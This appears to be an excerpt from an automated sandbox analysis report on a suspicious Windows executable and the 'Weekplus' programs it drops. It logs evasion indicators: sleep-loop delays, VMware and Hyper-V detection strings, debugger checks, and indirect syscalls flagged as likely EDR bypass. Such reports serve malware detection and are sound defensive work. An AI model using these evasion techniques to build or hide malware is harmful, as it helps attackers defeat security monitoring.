Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 7132	Thread sleep time: -596750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 7132	Thread sleep time: -596641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 7132	Thread sleep time: -596531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 7132	Thread sleep time: -596422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 7132	Thread sleep time: -596313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 7132	Thread sleep time: -596203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 7132	Thread sleep time: -596094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 7132	Thread sleep time: -595969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 7132	Thread sleep time: -595859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 7132	Thread sleep time: -595749s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 7132	Thread sleep time: -595641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 7132	Thread sleep time: -595531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 7132	Thread sleep time: -595422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 7132	Thread sleep time: -595311s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 7132	Thread sleep time: -595203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 7132	Thread sleep time: -595094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 7132	Thread sleep time: -594969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 7132	Thread sleep time: -594859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 7132	Thread sleep time: -594727s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 7132	Thread sleep time: -594625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 7132	Thread sleep time: -594514s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 7132	Thread sleep time: -594388s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 7132	Thread sleep time: -594265s >= -30000s	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe TID: 6288	Thread sleep count: 6628 > 30	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe TID: 404	Thread sleep count: 3014 > 30	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe TID: 2996	Thread sleep time: -12912720851596678s >= -30000s	Jump to behavior

Source: C:\Program Files\Weekplus\GamePlusPlus.exe

File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Code function: 0_2_00007FFDA55BA480 type_info::_name_internal_method,FindFirstFileExW,Concurrency::details::_Scheduler::_Scheduler,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,FindNextFileW,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,		0_2_00007FFDA55BA480
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00007FFD9B1AE20C FindFirstFileExW,		10_2_00007FFD9B1AE20C

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe

Code function: 0_2_00007FFDA55AA230 GetSystemInfo,

0_2_00007FFDA55AA230

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 599844	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 599718	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 599607	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 599500	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 599391	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 599266	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 599141	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 599031	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 598922	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 598812	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 598703	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 598594	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 598484	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 598375	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 598266	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 598141	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 598016	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 597794	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 597688	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 597563	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 597365	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 597097	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 596969	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 596856	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 596750	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 596641	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 596531	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 596422	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 596313	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 596203	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 596094	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 595969	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 595859	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 595749	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 595641	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 595531	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 595422	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 595311	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 595203	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 595094	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 594969	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 594727	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 594625	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 594514	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 594388	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 594265	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: Amcache.hve.9.dr	Binary or memory string: VMware
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2480965934.0000000005BF1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.9.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.9.dr	Binary or memory string: VMware, Inc.
Source: GamePlusPlus.exe, 0000000A.00000002.2494735564.00000196FBB41000.00000002.10000000.00040000.00000000.sdmp	Binary or memory string: ?%s %d.%d.%d.%d.%dC:\Program Files\VMware\VMware Tools\VMwareService.exeVMwareTray.exeVMwareUser.exelocalhostWORKGROUP\\.\PhysicalDrive0invalid string positionstring too long
Source: Amcache.hve.9.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.9.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.9.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.9.dr	Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: Amcache.hve.9.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2477474240.0000000002D09000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlloo`FP
Source: GamePlusPlus.exe, 0000000A.00000002.2494735564.00000196FBB41000.00000002.10000000.00040000.00000000.sdmp	Binary or memory string: C:\Program Files\VMware\VMware Tools\
Source: Amcache.hve.9.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2480965934.0000000005BF1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: Amcache.hve.9.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.9.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: GamePlusPlus.exe, 0000000A.00000002.2493857823.00000196F9E07000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.9.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.9.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.9.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.2480965934.0000000005BF1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: Amcache.hve.9.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.9.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.9.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.9.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.9.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.9.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.9.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.9.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.9.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.9.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe

Code function: 0_2_00007FFDA5592610 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FFDA5592610

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe

Code function: 0_2_00007FFDA55BF29F _invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,_aligned_msize,_invoke_watson_if_error,_aligned_msize,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_aligned_msize,_invoke_watson_if_error,_aligned_msize,_invoke_watson_if_error,_aligned_msize,_invoke_watson_if_error,__vcrt_lock,__vcrt_lock,GetFileType,WriteConsoleW,GetLastError,WriteFile,WriteFile,OutputDebugStringW,_invoke_watson_if_error,

0_2_00007FFDA55BF29F

Source: C:\Program Files\Weekplus\GamePlusPlus.exe

10_2_00007FF646E84790

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe

Code function: 0_2_00007FFDA55B9640 GetProcessHeap,

0_2_00007FFDA55B9640

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Code function: 0_2_00007FFDA5592610 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FFDA5592610
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Code function: 0_2_00007FFDA55B0830 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FFDA55B0830
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Code function: 0_2_00007FFDA5591A60 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FFDA5591A60
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00007FF646E83450 SetUnhandledExceptionFilter,	10_2_00007FF646E83450
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00007FF646E9FC38 memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00007FF646E9FC38
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00007FF646E9FE14 SetUnhandledExceptionFilter,	10_2_00007FF646E9FE14
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00007FFD9B19A298 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00007FFD9B19A298
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00007FFD9B1A1478 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00007FFD9B1A1478
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 10_2_00007FFD9B1B6D18 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00007FFD9B1B6D18

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files\Weekplus\GamePlusPlus.exe	NtMapViewOfSection: Indirect: 0x196FB6DDCA3
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	NtMapViewOfSection: Indirect: 0x196FB6DD766
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	NtUnmapViewOfSection: Indirect: 0x196FB6DDC37

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process created: C:\Program Files\Weekplus\APP.exe "C:\Program Files\Weekplus\APP.exe"	Jump to behavior
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Process created: C:\Program Files\Weekplus\GamePlusPlus.exe vrdashboard.exe -duplication_gpu_check
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Process created: C:\Program Files\Weekplus\GamePlusPlus.exe vrdashboard.exe -duplication_gpu_check
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Process created: C:\Program Files\Weekplus\GamePlusPlus.exe vrdashboard.exe -duplication_gpu_check

Source: GamePlusPlus.exe, 0000000A.00000002.2493671807.00000039FF1FA000.00000004.00000010.00020000.00000000.sdmp, sys.key.10.dr	Binary or memory string: :]Program Manager
Source: GamePlusPlus.exe, 0000000A.00000002.2493609659.00000039FEFF8000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: Program Manager

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe

Code function: 0_2_00007FFDA55D0460 cpuid

0_2_00007FFDA55D0460

Source: C:\Program Files\Weekplus\GamePlusPlus.exe

Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WSMan.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
